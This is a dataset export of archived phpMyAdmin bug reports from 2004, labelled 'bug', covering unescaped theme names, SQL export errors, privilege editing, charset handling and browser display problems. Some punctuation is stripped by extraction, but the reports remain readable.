"24444","7772","Escape the theme name.
There are places in themes.php where I think you need to be escaping the theme name.
Line numbers below refer to the CVS snapshot from 20040824.
For example, lines 122 and 123 document.write alt= lt;?php echo theme name; ?
gt; Theme ); document.write title= lt;?php echo theme name; ?
gt; Theme gt; ); Doesn t that have to escape the string for JavaScript use, in case a theme name contains special characters like an apostrophe, with something like addslashes )?
And lines 109 and 132 echo lt;b gt; .
theme name .
lt; b gt; ; echo lt;img src= .
screen directory .
screen.png border= 1 alt= .
theme name .
Theme gt; ; Doesn t that have to escape the string for use in HTML, in case a theme name contains reserved chanacters like lt; and gt;, by using something like htmlspecialchars )?
The same would go for 634 of main.php echo gt; .
available themes choices names[ cur theme] .
lt; option gt; ; Original URL https sourceforge.net p phpmyadmin bugs 1405 https sourceforge.net p phpmyadmin bugs 1405 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7773","<br> tags in some language files.
Some of the language files contain lt;br gt; tags instead of lt;br gt; tags) CVS snapshot 20040824 Original URL https sourceforge.net p phpmyadmin bugs 1406 https sourceforge.net p phpmyadmin bugs 1406 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7774","Nonlocalized strings in themes.php.
There are some non localized strings in themes.php, such as alert No theme support, please check your configs\nand or your themes in lt;?php echo .
.
cfg[ ThemePath ]; ?
gt; ); and alt= lt;?php echo theme name; ?
gt; Theme CVS snapshot 20040824 Original URL https sourceforge.net p phpmyadmin bugs 1407 https sourceforge.net p phpmyadmin bugs 1407 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7775","queryframe shows HTTP headers in Safari.
In Safari 1.2.3 for Mac OS X 10.3.5, we now have this problem The top left frame is displaying HTTP headers.
See attached screenshots.
This happens in the 20040816 and 20040824 CVS snapshots but did not happen in the 20040812 snapshot.
This only happens in the Darkblue Orange theme; doesn t happen in the Original theme.
I don t see the problem in Firefox 0.9.1 or in Internet Explorer 5.2.3 for Mac.
Only in Safari.
It happens regardless whether the server is running PHP 4.3.6 or 5.0.1.
With 5.0.1, the HTTP headers are followed by the plain text HTML code.
With 4.3.6, some of the headers are different namely X ob mode 1, Content Encoding gzip, Vary Accept Encoding) and the bytes following the HTTP headers are presumably Gzip encoded.
If I Control click on the top left frame and ask to see that frame in a new window by itself, it draws correctly.
The problem only appears when initially loading the frameset.
If I do something that refreshes the top left frame, such as creating a database, the frame then redraws correctly.
I looked through the diff between the 20040812 and 20040816 version, and the only thing I see that might possibly have something to do with it is the new code to do theme names and theme minimum versions.
Upon first read the code looks innocent enough, but I can t imagine where else the problem could be.
Maybe some malformed HTTP header possibly a Set Cookie) is being sent, and it s destroying Safari s ability to understand the rest of the headers.
Note that this problem can only be tested in Safari by first applying the patch I submitted in bug report 1006514.
Otherwise you just get a blank top left frame most of the time.
Original URL https sourceforge.net p phpmyadmin bugs 1408 https sourceforge.net p phpmyadmin bugs 1408 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7776","missing quotes in export file.
missing quotes for TIMESTAMP field in export file INSERT INTO `tablename` VALUES ..., 0, 2004 08 26 14 27 45); mysql 4.1.3 php 5.1 dev Original URL https sourceforge.net p phpmyadmin bugs 1409 https sourceforge.net p phpmyadmin bugs 1409 Original author anonymous Found in version 2.6.0 rc1","bug"
"24444","7777","Wrong db name phpmyadmin) in SHOW KEYS.
when i want to ad relations to my tables i get an mysql error SHOW KEYS FROM `menu block` ; 1146 Table phpmyadmin.menu block doesent exist when i manual add the relations i get the same error every time i want to execute an sql command an show the results System Apache 2.0.50 Win32) php 5.0.1 mysqli interface Client API version 4.1.3 beta MySQL 4.0.20a nt max Original URL https sourceforge.net p phpmyadmin bugs 1410 https sourceforge.net p phpmyadmin bugs 1410 Original author woodworker Found in version 2.6.0 rc1","bug"
"24444","7778","Undefined Index Select priv in in .. server privileges.php.
I am using PHP 5.0.1, MySQL 4.1.3 on Windows XP SP2.
When I navigate from Home gt;Privileges gt;Edit user pma gt;edit database mysql gt;edit table user I see the following error messages Notice Undefined index Select priv in F \Apache2 \HTDOCS\phpMyAdmin 2.6.0 rc2\server privileges.php on line 392 This is duplicated for all the other fields within the user table.
Original URL https sourceforge.net p phpmyadmin bugs 1411 https sourceforge.net p phpmyadmin bugs 1411 Original author tonymarston Found in version Latest Git snapshot","bug"
"24444","7779","latin does n work MySQL 4.1.0).
Hi, work with Privileges does not work.
Problem is propably because MySQL 4.1.0 alpha log does not support some thing like ... = latin1 string ... mysql gt; SELECT `User`, `Host`, IF `Password` = latin1 , N , Y ) AS Password FROM `user` ORDER BY `User` ASC, `Host` ASC; ERROR 1210 Wrong arguments to = mysql gt; select version ); | version ) | | 4.1.0 alpha log | 1 row in set 0.00 sec) Any help??
Thanks Radim uchacr x base.cz Original URL https sourceforge.net p phpmyadmin bugs 1412 https sourceforge.net p phpmyadmin bugs 1412 Original author anonymous Found in version 2.6.0 rc1","bug"
"24444","7780","CSV for Excel 2003.
I am using Windows XP und Excel 2003.
When I export CSV data for Excel and select Windows), my Excel does not show the file correctly all cols in one col).
When I export Excel CSV for Macintosh my Excel is able to read the file correctly.
Did you mix it up?
Or what happened? )
Or does Excel 2003 behave like Excel for Mac?
Original URL https sourceforge.net p phpmyadmin bugs 1413 https sourceforge.net p phpmyadmin bugs 1413 Original author hczedik","bug"
"24444","7781","Backquotes still present in constraints even if not requestd.
Request a schema dump via database gt; export, and don t check the Enclose table and field names with backquotes field.
The constraint definitions at the end of the listing still contain backquotes.
The table list is fine, it has no quotes.
Example Table structure for table `log file` CREATE TABLE log file id log file int 11) NOT NULL auto increment, id log instance int 11) default NULL, id cf filetype int 11) default NULL, filename varchar 255) collate latin1 german1 ci NOT NULL default COMMENT name of the file , filesize int 11) NOT NULL default 0 COMMENT size of the file , filetime datetime NOT NULL default 0000 00 00 00 00 00 COMMENT timestamp of the file , contents mediumtext collate latin1 german1 ci NOT NULL COMMENT contents of the file , PRIMARY KEY id log file), KEY idx id log instance id log instance) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1 german1 ci COMMENT= attached complete file from analysis AUTO INCREMENT=1 ; Constraints for table `log file` ALTER TABLE `log file` ADD CONSTRAINT `log file ibfk 1` FOREIGN KEY `id log instance`) REFERENCES `log instance` `id log instance`) ON UPDATE CASCADE; MySQL 4.1.3 php 4.2.2 phpMyAdmin 2.6.0 rc1.
Original URL https sourceforge.net p phpmyadmin bugs 1414 https sourceforge.net p phpmyadmin bugs 1414 Original author alexw Found in version 2.6.0 rc1","bug"
"24444","7782","Bad comment matching in read dump.inc.php.
The comment matching at line 75 of read dump inc.php makes incorrect assumptions when matching imported code for comments.
Quick demonstration enter nothing else) into the SQL command dialogue.
The code looks at the current char, then the next and subsequent char, without checking that those subsequent chars exist.
Exports from 2.6.0 rc1 can include output which falls fowl of this.
The notices are only visible with error reporting E ALL).
Original URL https sourceforge.net p phpmyadmin bugs 1417 https sourceforge.net p phpmyadmin bugs 1417 Original author hollymcr Found in version 2.6.0 rc1","bug"
"24444","7783","Insert data from a textfile into table ERROR docs!).
Here is the error I get now with the new stable version that the older versions never had when loading the data tables from a text file Error SQL query LOAD DATA LOCAL INFILE C \\PHP\\uploadtemp\\php4F.tmp REPLACE INTO TABLE `colors` FIELDS TERMINATED BY ; OPTIONALLY ENCLOSED BY ESCAPED BY \\ LINES TERMINATED BY \r\n MySQL said 1148 The used command is not allowed with this MySQL version lwgreyhounds lwgreyhounds.com Original URL https sourceforge.net p phpmyadmin bugs 1415 https sourceforge.net p phpmyadmin bugs 1415 Original author anonymous Found in version 4.0.9","bug"
"24444","7784","Error.. Notice Undefined variable sql query in tbl change.php on line 54 Original URL https sourceforge.net p phpmyadmin bugs 1416 https sourceforge.net p phpmyadmin bugs 1416 Original author anonymous","bug"
"24444","7785","Empty BLOB fields are not exported correctly.
When a blob binary field is exported and it s empty... the SQL that is outputed does not work.
It prints 0x and nothing else, it should print like mysqldump does.
This happens on insert or update queries.
It seems to be ok on XML or Latex since it just prints a null string.
Original URL https sourceforge.net p phpmyadmin bugs 1418 https sourceforge.net p phpmyadmin bugs 1418 Original author patangay Found in version 2.6.0 rc1","bug"
"24444","7786","Login Password not accepted.
I cannot log in to my local) MySQL server via phpMyAdmin as any user that has a password set.
Logging in as such a user via the MySQL client works fine.
However, I can log in via phpMyAdmin if the user has no password.
Running MySQL 4.1.3 and phpMyAdmin 2.6.0 rc1 on Fedora Core 2.
From config.inc.php cfg[ Servers ][ i][ auth type ] = http ; The initial phpMyAdmin page after login shows Language English en utf 8) MySQL charset UTF 8 Unicode utf8) MySQL connection collation utf8 general ci in my environment, LANG=en US.UTF 8 Original URL https sourceforge.net p phpmyadmin bugs 1419 https sourceforge.net p phpmyadmin bugs 1419 Original author usdanskys Found in version 2.6.0 rc1","bug"
"24444","7787","left frame blank when selecting database w >87 tables.
Have researched my prolem and my humble conclusion is.
Not Client related OS2 win2k IE Mozilla Firefox version 2.5.7 2.6.0 various releases all affected Opening frame in new window does produce correct results but using windows instead of frames isn t doing usability a lot of good.
Database is correct, other applications phpnuke) have no problem with it.
No errors from Apache PHP MySQL phpinfo can be checked at http suzy.geurts.homeip.net 2 screen shots are also available from the same site.
Regards, Djerk Geurts mailto d.m.geurts geurtscass.com Original URL https sourceforge.net p phpmyadmin bugs 1420 https sourceforge.net p phpmyadmin bugs 1420 Original author anonymous Found in version 2.5.7 pl1","bug"
"24444","7788","display pic not working plzz in amsn for windows.
why I have this problems plz and what shall I do??
mail me soon at omar hajj msn.com Original URL https sourceforge.net p phpmyadmin bugs 1421 https sourceforge.net p phpmyadmin bugs 1421 Original author click77me Found in version 2.2.0","bug"
"24444","7789","Problem with ORDER BY in UNION Querys.
Have two tables containing a timestamp.
I do a UNION query and select columns from both.
When i write ORDER BY TS in my query it works fine.
But if i try to use the GUI to order by any column i get a SQL error since the ORDER BY function in the GUI tries to give the table name to ORDER BY aswell.
Example SELECT posts.TS FROM posts WHERE 1 UNION SELECT threads.TS FROM threadsd WHERE 1 ORDER BY TS lt; This is how it should be ORDER BY posts.TS lt; This is the order statemen used by phpMyAdmin Submitted by Nicklas, nicklas.haraldsson taftea.com Original URL https sourceforge.net p phpmyadmin bugs 1422 https sourceforge.net p phpmyadmin bugs 1422 Original author anonymous","bug"
"24444","7790","Errors in PHP Safe Mode.
I just installed 2.5.7 pl1, and we have safe mode on for that virtualhost.
I noticed that the css doesn t loads correctly, so i checked several things.
finally i found this [04 Sep 2004 16 46 16] PHP Warning chdir ) SAFE MODE Restriction in effect.
The script whose uid is 52400 is not allowed to access .. owned by uid 0 in path to phpmyadmin css phpmyadmin.css.php on line 5 I don t really get why chdir ) needed, but safe mode is very important i think and may be not needed here.
Original URL https sourceforge.net p phpmyadmin bugs 1423 https sourceforge.net p phpmyadmin bugs 1423 Original author anonymous Found in version 2.5.7 pl1","bug"
"24444","7791","Incorrect theme version check code.
CVS snapshot 20040827 053501 the theme version check code is checking a condition opposite of what it should.
code says in common.lib.php) if theme version lt; PMA THEME VERSION) GLOBALS[ theme ] = original ; too old version in english if the version of the theme API used by this theme is too old, then that s not ok, use the default theme.
but i would expect that PMA will remain compatible with older themes, just as it remains compatible with older config files.
it cannot, however, guarantee compatibily with theme files created in the future.
what i think we actually want if the version of the theme API used by this theme is too NEW, then that s not ok, use the default theme.
likely we will have additional themeable features in future versions of PMA.
themes written to such a future theme API will not work properly in older versions of PMA properties may have been renamed, for example.
such themes should not be allowed to be selected.
that s what we should be checking here.
corrected code if theme version gt; PMA THEME VERSION) GLOBALS[ theme ] = original ; theme needs newer version of PMA similar code appears in select theme.lib.php and themes.php and needs to be corrected there as well.
but perhaps worth considering do we need a second constant, PMA MIN THEME VERSION, defining the minimum or lowest version of the theme API that is supported?
we could envision a version of PMA in the future that completely reimplements the theme API, and drops support for the older theme format...
Original URL https sourceforge.net p phpmyadmin bugs 1424 https sourceforge.net p phpmyadmin bugs 1424 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7792","Notice Undefined variable sql query.
After page Insert data from a textfile into table link on page Structure ) click on Insert in top menu.
There is php error Notice Undefined variable sql query in C \phpMyAdmin\tbl change.php on line 54 Best regards Saga lt;saga at)hotbox dot)ru gt; Original URL https sourceforge.net p phpmyadmin bugs 1427 https sourceforge.net p phpmyadmin bugs 1427 Original author anonymous Found in version 2.6.0 rc2","bug"
"24444","7793","DateTime insert in edit mode.
When I edit a record with a DATETIME field, there is a button next to the field, that opens a popup calendar.
When this popup is opened, it shows nothing.
In Internet Explorer, it says Object undefined.
.
In Mozilla Firefox 0.9.3, it says Error initCalendar is not defined.
.
Original URL https sourceforge.net p phpmyadmin bugs 1425 https sourceforge.net p phpmyadmin bugs 1425 Original author mrcorex Found in version 2.6.0 rc1","bug"
"24444","7794","Loses Frames In Firefox.
In Firefox browser, phpMyAdmin displays frames differently and badly.
In IE it displays correctly but in Firefox the databases drop down is on top, and the resulting output is below.
Very messy.
Might want to code the display for Mozilla instead of just IE.
Original URL https sourceforge.net p phpmyadmin bugs 1426 https sourceforge.net p phpmyadmin bugs 1426 Original author anonymous Found in version 2.6.0 rc1","bug"
"24444","7795","error in SQL export of foreign keys if Add drop table set.
If you have tables with foreign keys, and you export with the Add drop table option, then it s very possible that running this SQL on the same database will fail because the DROP TABLE statements will break the foreign key relationship.
to reproduce 1) run the SQL below CREATE TABLE aparent id int 11)); CREATE TABLE child aparent id int 11)); ALTER TABLE child ADD INDEX aparent id); ALTER TABLE child ENGINE = INNODB; ALTER TABLE aparent ADD INDEX id); ALTER TABLE aparent ENGINE = INNODB; ALTER TABLE child ADD CONSTRAINT FOREIGN KEY aparent id) REFERENCES aparent id); insert into aparent values 100); insert into child values 100); 2) do an export, selecting the Add drop table option 3) run this export back in the same database You get an error because the statement to drop the parent table appears before the statement to drop the child table.
Note that this only occures if the parent table name is before in lexicographic order) the child table name.
Noter that this is not a duplicate of 807615 or 979635 here, it s only when the Add drop table option is set in the export.
However, the solution 2 I propose below would also solve those bugs I think ).
I see different ways to fix that 1) either drop the constraints at the beginning of the file, before droping the tables.
However, this would require to be sure that the name of the constraints is known foreign key constraints can only be dropped by name).
So it would only work if the name has been set correctly and not defaulted to any value by the engine.
see http dev.mysql.com doc mysql en InnoDB foreign key constraints.html IDX1885 2) or put SET FOREIGN KEY CHECKS = 0; at the begining of the export, and SET FOREIGN KEY CHECKS = 1; This seems to me a better solution, as it will always work, and is also the advised method to use by the MySQL documentation when using mysqldump see page mentionned above.
I m running phpMyAdmin 2.5.7 pl1 with MySQL 4.0.20a nt max thanks !
Original URL https sourceforge.net p phpmyadmin bugs 1428 https sourceforge.net p phpmyadmin bugs 1428 Original author anonymous Found in version 2.5.7 pl1","bug"
"24444","7796","Error in browse foreigners.php paging).
2.6.0 rc2 When looking for foreign keys in browse foreigners.php link from tbl change.php) I cannot browse to next pages by pop up page number .
Every time I see only the first page.
lt;server gt; browse foreigners.php?
field=id interpret lang=cs win1250 server=1 db=cerno table=fm odkazy pk= 60id 60 3D 271305 27pos 3D200pos=200 Original URL https sourceforge.net p phpmyadmin bugs 1429 https sourceforge.net p phpmyadmin bugs 1429 Original author anonymous Found in version 2.6.0 rc2","bug"
"24444","7797","Drop down databases list keep focus.
After changing a database by picking it from a drop down list, this list is still highlighted .
It is a little confusing when using mouse roller roller rolls drop down list instead of page in a right frame.
Original URL https sourceforge.net p phpmyadmin bugs 1430 https sourceforge.net p phpmyadmin bugs 1430 Original author toszcze Found in version Latest Git snapshot","bug"
"24444","7798","Export of INNODB structure and data) done in wrong order.
A dump of an INNODB database s structure data is done in alphabetical order.
Also PHPMyAdmin tries to insert data immediately after the first table is created.
This produces errors because of data integrity dependencies with references.
I suggest u look at the output of DBDESIGNER 4, which is open source and produces no errors.
Because it generates output in the right order, there also is no need to alter tables later on to create foreign keys.
If attached a txt file with PHPMyAdmin and DBDESIGNER sample output.
Original URL https sourceforge.net p phpmyadmin bugs 1431 https sourceforge.net p phpmyadmin bugs 1431 Original author anonymous","bug"
"24444","7799","Specifying db=... in URL and cookie auth.
There s a very handy undocumented feature whereby you can access a URL like this http www.example.com phpMyAdmin index.php?
db=some database ...and when PMA loads, it will automatically select that database.
If you re using cookie authentication, however, and have not yet logged in, then you are shown the main phpMyAdmin page instead.
Perhaps this could be fixed, so that the indicated database is chosen, even if the cookie auth login page needs to be shown.
Perhaps this feature could be documented somewhere as well.
Or is it already, and I just didn t notice?)
Occurs in versions up to 20040913 snapshot at least.
Original URL https sourceforge.net p phpmyadmin bugs 1432 https sourceforge.net p phpmyadmin bugs 1432 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7800","Check all in add new user checks all users.
phpMyAdmin 2.6.0 rc2 Firefox 0.9.3 Windows XP SP1 PHP 4.3.8 MySQL 4.1.4 1\.
Click Privileges from the Home page 2\.
Click Add New User 3\.
Enter a username password 4\.
Click Check All UI returns to the User Overview page and checks all the users, instead of checking all the privileges on the Add User page as it should have done.
Original URL https sourceforge.net p phpmyadmin bugs 1433 https sourceforge.net p phpmyadmin bugs 1433 Original author dugsmith Found in version 2.6.0 rc2","bug"
"24444","7801","Broken highlighting in left frame for nested tbl.
Highlighting in left frame marks too much tables when using table nesting, see screenshot.
Original URL https sourceforge.net p phpmyadmin bugs 1434 https sourceforge.net p phpmyadmin bugs 1434 Original author nijel Found in version Latest Git","bug"
"24444","7802","SELECT statement for editing a row last long on big tables.
I have a big table with more than 3 million rows.
When I will edit a row pma does the following query SELECT FROM `table` WHERE CONCAT `table id` ) = 3 ; Because of the CONCAT this query lasts 30 sec, without it 0.007 sec.
If I select 4 rows and then click on edit it will last 2 min until I see the input fields for editing the rows.
It would be great if you could remove this concat.
Original URL https sourceforge.net p phpmyadmin bugs 1435 https sourceforge.net p phpmyadmin bugs 1435 Original author j0erch","bug"
"24444","7803","Allow import of non UTF 8 SQL files MySQL 4.1).
I have a latin1 database.
I want to import a .sql file which includes several tables.
This file is also in latin1 a result of mysqldump).
I go to database|SQL see full link below) and use the upload button to select the file.
http localhost phpmyadmin db details.php?lang=de utf 8 server=1 collation connection=latin1 german1 ci db=mylibrary goto=db details structure.php db query force=1 Now the problem phpmyadmin seems to interpret the file as an UTF 8 file.
Characters with code gt;127 are imported wrong.
This is even the case if I manually set the browser to latin1 encoding.
Proposal for solution The should be a way to specify the character set of the file to import.
Original URL https sourceforge.net p phpmyadmin bugs 1436 https sourceforge.net p phpmyadmin bugs 1436 Original author kofler Found in version 2.6.0 rc2","bug"
"24444","7804","result set not freed.
i set showing sql errors in php without using sql error ) so everytime PHP shows this error in the end of a site in PHPMYADMIN Warning null) ) [function.mysql free result] 1 result set s) not freed.
Use mysql free result to free result sets which were requested using mysql query ) in Unknown on line 0 Original URL https sourceforge.net p phpmyadmin bugs 1437 https sourceforge.net p phpmyadmin bugs 1437 Original author noscript Found in version 2.6.0 rc2","bug"
"24444","7805","Updating mysql.user erases privileges.
When editing a users privileges on the mysql.user table, after sending the query, all privileges are set to N or null.
The statement being produced by the edit script tbl change.php?)
looks like this UPDATE `user` SET `Select priv` = Y,Y , `Insert priv` = Y,Y , `Update priv` = Y,Y , `Delete priv` = Y,Y , `Create priv` = Y,Y , `Drop priv` = Y,Y WHERE `Host` = localhost AND `User` = sugar LIMIT 1 So it s fairly obvious why the privileges are getting screwed up, Y,Y is not a valid entry for the privileges, it s more a question of why is phpMyAdmin doing this?
Apache 2.045 MySql 4.0.21 PHP 4.3.1 RedHat 8 Original URL https sourceforge.net p phpmyadmin bugs 1438 https sourceforge.net p phpmyadmin bugs 1438 Original author thechurch Found in version 2.5.7 pl1","bug"
"24444","7806","Clicking left pane options opens new window.
Clicking the HOME icon or any of the database names on the far left of the screen causes a new browser window to open instead of replacing whatever is in the right pane of the main window.
This seems to happen only after the window has been open and in use for some time.
Also, clicking the Log Out icon triggers a request for a name and password to log in !).
When these are given, the request appears again, over and over.
Browser Safari 1.2.3 OS X Server 10.3.5 MySQL 4.0.18 on localhost PHP 4.3.2 Apache module) Original URL https sourceforge.net p phpmyadmin bugs 1439 https sourceforge.net p phpmyadmin bugs 1439 Original author roblewis Found in version 2.6.0 rc2","bug"
"24444","7807","Importing when last table exported was empty.
lem9 If the last exported table exported from phpMyAdmin) has no data, the export file ends with those ANSI style comments Dumping data from table table1 and MySQL gives an error on this!
No problem if the file ends with MySQL style comments.
nijel The problem is that phpMyAdmin removes trailing space, so it is not valid ANSI comment then 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near at line 3 lem9 The trim occurs at 2 places read dump.php, line 138 libraries read dump.lib.php, line 21 The bug is fixed by replacing the one at line 21 by sql = rtrim sql, \n\r ); avoid removing the last space which is necessary for ANSI style comment) and removing the one at line 138, however can someone tell me the purpose of the trim at line 138?
Original URL https sourceforge.net p phpmyadmin bugs 1440 https sourceforge.net p phpmyadmin bugs 1440 Original author lem9 Found in version 2.6.0 rc2","bug"
"24444","7808","Mac Excel CSV export needs Mac Roman charset not ISO 8859 1.
I have not tested newer versions, but at least in the CVS snapshot phpMyAdmin 20040915 053501 and earlier, I have this problem The export option Excel 2003 Macintosh exports a CSV file in the ISO 8859 1 charset or, possibly, in the charset of my database server, which is ISO 8859 1).
But Excel for Mac expects a file in the Mac Roman charset.
Original URL https sourceforge.net p phpmyadmin bugs 1441 https sourceforge.net p phpmyadmin bugs 1441 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7809","Native Excel export wrong charset when UTF 8 language.
PMA CVS snapshot from 2004 09 15 If I turn on anywhere recoding, and log in with the en utf 8 language file, and I export something from my ISO 8859 1 database as native Excel format, then the file that gets written contains UTF 8 data, which gets shown incorrectly in Excel.
The charset that I select on the export screen does not appear to be used for anything in this case; changing the charset selection does not produce a different output file.
Since the native Excel format appears to require a specific charset ISO 8859 1?)
in order to function, the user should be prevented from exporting data in this format an error should be displayed) unless anywhere recoding is on or the database charset is already the required charset), and the user should not have the option to select another output charset.
See also bug 1031780 Original URL https sourceforge.net p phpmyadmin bugs 1442 https sourceforge.net p phpmyadmin bugs 1442 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7810","Import Files has no submit.
Using phpMyAdmin 2.6.0 RC2 and when I click on the SQL command icon on the left side of screen to launch SQL window, then click Import Files, it gives me a window to select a file.
I can select a file ok, but there s no submit button to execute the command.
Running Mozilla Firefox 1.0 PR.
Original URL https sourceforge.net p phpmyadmin bugs 1443 https sourceforge.net p phpmyadmin bugs 1443 Original author okapi1253 Found in version 2.6.0 rc2","bug"
"24444","7811","Search changes.
With rc3, now when you use tbl select.php aka Search functionality in phpmyadmin.
The query the query is rewritten to use the convert function.
So a simple query that used to look like this SELECT FROM `IPBots` WHERE `banned` = Y ) Now looks like this SELECT FROM `IPBots` WHERE `banned` = CONVERT utf8 Y USING latin1 ) Either hide the CONVERT by not showing it in the returned results, or write it the old way.
Just my opinion.
Donny Original URL https sourceforge.net p phpmyadmin bugs 1444 https sourceforge.net p phpmyadmin bugs 1444 Original author donsimon Found in version 2.6.0 rc3","bug"
"24444","7812","Table list doesn t update after db load.
phpMyAdmin 2.6.0 rc3 IE6 and Firefox 1.0PR browsers Apache 1.3.31 on Windows 2000 all service packs applied) PHP 4.3.8 MySQL 4.0.15 on Mandrake 9.2 When loading the Mantis database tables into a new database, the table list on the lefthand side doesn t update.
Here s the steps after signing into pma 1) Create a new database using entry field and button on pma front page.
2) Click SQL tab.
3) Load the attached file under Location of the textfile .
4) The database tables are generated, but they re not listed on the lefthand side as expected.
Original URL https sourceforge.net p phpmyadmin bugs 1445 https sourceforge.net p phpmyadmin bugs 1445 Original author smagruder","bug"
"24444","7813","Can t drop db using Firefox.
phpMyAdmin 2.6.0 rc3 Firefox 1.0PR browser Apache 1.3.31 on Windows 2000 all service packs applied) PHP 4.3.8 MySQL 4.0.15 on Mandrake 9.2 After clicking on the drop tab to drop a whole database, I get the Javascript window.
I click the OK button and go ahead to delete, but nothing happens.
This works normally using IE and Mozilla.
Original URL https sourceforge.net p phpmyadmin bugs 1446 https sourceforge.net p phpmyadmin bugs 1446 Original author smagruder Found in version 2.6.1 pl3","bug"
"24444","7814","Undefined variable theme generation.
after updating to 2.6.0 rc3 I noticed the error message when changing a record.
Undefined variable theme generation in tbl change.php in our setup with do not have .
in the include path and I think this causes this error, I have changed the ThemePath variable to .
themes and then it works.
I think the sequence of variable checks is somehow wrong in libraries common.inc.php around line 337 Original URL https sourceforge.net p phpmyadmin bugs 1447 https sourceforge.net p phpmyadmin bugs 1447 Original author alexlehm Found in version 2.6.0 rc3","bug"
"24444","7815","Unable to authenticate.
Particulars mysql Ver 14.5 Distrib 4.1.3 beta, for pc linux i686) php v4.2.2 Linux istdev.XXXXXX.net 2.4.20 8smp 1 SMP Thu Mar 13 17 45 54 EST 2003 i686 i686 i386 GNU Linux We re currently using 2.5.7 pl1 for production and have been watching and eagerly waiting for the 2.6.0 release.
I ve got 2.6.0 rc2 loaded in a separate directory, each time, we unpack, and make two changes to the config.inc.php file and it has worked flawlessly bugs not included in that assessment) We change this cfg[ PmaAbsoluteUri DisableWarning ] = FALSE; to this cfg[ PmaAbsoluteUri DisableWarning ] = TRUE; and this cfg[ Servers ][ i][ auth type ] = config ; to this cfg[ Servers ][ i][ auth type ] = http ; This time we got rc3 and did the same thing and it doesn t seem to want to authenticate connect.
I ve reloaded rc2, made the above changes, and verified that it works without issue.
Since the changes we re making are so minimal, I m wondering what changed?
I realize we re on an old er) version of php, could that have something to do with it?
Original URL https sourceforge.net p phpmyadmin bugs 1448 https sourceforge.net p phpmyadmin bugs 1448 Original author bunchah Found in version 2.6.0 rc3","bug"
"24444","7816","Quote DB name in exported USE Statement.
Hi, I just exported a whole Test DB running on MySQL 4.1.4 to import it in the new Testsystem 4.1.5 Importing the SQL into the new DB I got an error SQL Befehl USE avb api MySQL meldet 1064 Fehler in der SQL Syntax.
Bitte die korrekte Syntax im Handbuch nachschlagen diese kann f?
schiedene Server Versionen unterschiedlich sein) bei api in Zeile 1 This is, because the DB name avb api is not put between quotes.
In the erroneus SQL statement as returned from MyAdmin are spaces in the DB name that are not in the SQL file.
Something cannot handle the DB name with the dash if it s not put in quotes.
Should be simple for you to fix.
I use a current CVS version.
Same version to ex and import.
It lables itself phpMyAdmin 2.6.0 rc3 Best, Bernhard Original URL https sourceforge.net p phpmyadmin bugs 1449 https sourceforge.net p phpmyadmin bugs 1449 Original author bardware","bug"
"24444","7817","Illegal mix of collations after CONVERT ).
Hello again, I query a DB using the LIKE operator.
PHPMyAdmin automatically converts the given constant which I search in the DB) from UFT8 to Latin1 applies CONVERT function to SQL statement).
My problem is I get an error though, because the standard collation of the latin1 charset is swedish.
I in my queries personally prefere german sortings.
That s why I currently cannot use the MyAdmin search functionality because I explicitly have to add a COLLATE latin1 german1 ci clause to the SQL statement.
Can you somehow change PHPMyAdmin in a way the resultset collation is fixed to either a given type or the type of the field queried?
I use a current CVS version of MyAdmin labelling itself phpMyAdmin 2.6.0 rc3 Best, Bernhard Original URL https sourceforge.net p phpmyadmin bugs 1450 https sourceforge.net p phpmyadmin bugs 1450 Original author bardware Found in version 2.6.0 rc3","bug"
"24444","7818","clicking on Data Dictionary icon shows error.
I have two databases, one is phpmyadmin and the other is called es .
When I click on the Data Dictionary link on the home page for the es database, I get the following error SQL query SHOW KEYS FROM `artifact` ; MySQL said 1146 Table phpmyadmin.artifact doesn t exist So it thinks the current database is phpmyadmin when it should be es .
I tried quitting out of the browser and going back in, but I got the same error.
Original URL https sourceforge.net p phpmyadmin bugs 1454 https sourceforge.net p phpmyadmin bugs 1454 Original author thujone Found in version 2.6.0 rc3","bug"
"24444","7819","browse mode row highlight checkbox desynch.
Using mozilla, when in browse mode, clicking on a row changes its background color to orange and checks its corresponding check box for mass operations edit delete).
This bug report actually reports two bugs 1) The table columns checkbox , edit , and delete when clicked on the space between cell border and link image changes background color of the row but doesn t checks the checkbox.
2) Nevertheless the above bug, when switching checkbox you should base your new checkbox status on the status of the background color or vice versa), and NOT on the previous status, because in case of a desynch bug it is impossible to fix it clicking on it switches the checkbox and the background color but the desynch remains).
Hope this explains the problem I encoutered, Best regards Original URL https sourceforge.net p phpmyadmin bugs 1451 https sourceforge.net p phpmyadmin bugs 1451 Original author themnemonic Found in version 2.6.0 rc3","bug"
"24444","7820","Wrong export of 0 .
After exporting database to SQL file all string fileds containing 0 zero) are empty.
eg.
should be INSERT INTO `table name` VALUES 1, 0 ); is INSERT INTO `table name` VALUES 1, ); The database is on Linux 2.4.26, PHP Version 4.3.6 Zend 1.3.0), MySQL 3.23.54, Apache 1.3.27 Unix) mod ssl 2.8.12 OpenSSL 0.9.6g Browser Mozilla Firefox PR1.0 on Windows but I do not think it s a problem) The same problem was on phpmyadmin 2.6.0 rc2.
I haven t tested it on other versions.
If you will need any more info let me know Original URL https sourceforge.net p phpmyadmin bugs 1452 https sourceforge.net p phpmyadmin bugs 1452 Original author maurycy Found in version 2.6.0 rc3","bug"
"24444","7821","can t add comments to a table.
Same problem as the last bug I submitted, 1034299.
When adding comments to a table from the operations page, the resulting error says that the current database is phpmyadmin when it should not be.
Original URL https sourceforge.net p phpmyadmin bugs 1456 https sourceforge.net p phpmyadmin bugs 1456 Original author thujone Found in version 2.6.0 pl1","bug"
"24444","7822","Incorrectly appending LIMIT to queries.
The problem is that it appends the LIMIT to all queries.
This is an issue when you click on edit refresh explain etc.
as the inherit the limit and thus return unexpected results.
Comparing 2.6.0 RC1 and 2.6.0 final I found the offending code is sql.php Line 323 if isset display query)) \{ if preg match .|\n) ) [[ space ]] PROCEDURE[[ space ]] .
)|FOR[[ space ]] UPDATE|LOCK[[ space ]] IN[[ space ]] SHARE[[ space ]] MODE))|;)[[ space ]] i , display query, regs)) \{ display query = regs[1] .
